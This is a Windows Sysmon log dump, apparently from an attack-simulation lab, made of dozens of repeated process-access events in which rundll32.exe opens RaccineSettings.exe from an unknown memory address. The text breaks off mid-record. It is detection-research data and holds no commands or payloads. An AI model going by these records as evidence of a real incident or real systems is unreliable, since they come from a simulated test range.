10341000x80000000000000002082943Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082942Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082941Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082940Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082939Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.624{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082938Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082937Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082936Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082935Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082934Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082933Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082932Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082931Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082930Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082929Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082928Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082927Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082926Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082925Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082924Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082923Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082922Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082921Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082920Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082919Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082918Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082917Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082916Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082915Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082914Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082913Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082912Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082911Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082910Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082909Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082908Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082907Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082906Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082905Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082904Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082903Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082902Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082901Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082900Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082899Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082898Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082897Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082896Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082895Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082894Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082893Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082892Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082891Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082890Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082889Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082888Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082887Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082886Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082885Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082884Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.623{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082883Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082882Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082881Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|UNKNOWN(00000178EBE58C59) 10341000x80000000000000002082880Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 16:31:59.622{9DBE88B5-2F7E-61B2-AE03-010000000E02}16083308C:\Windows\System32\rundll32.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program 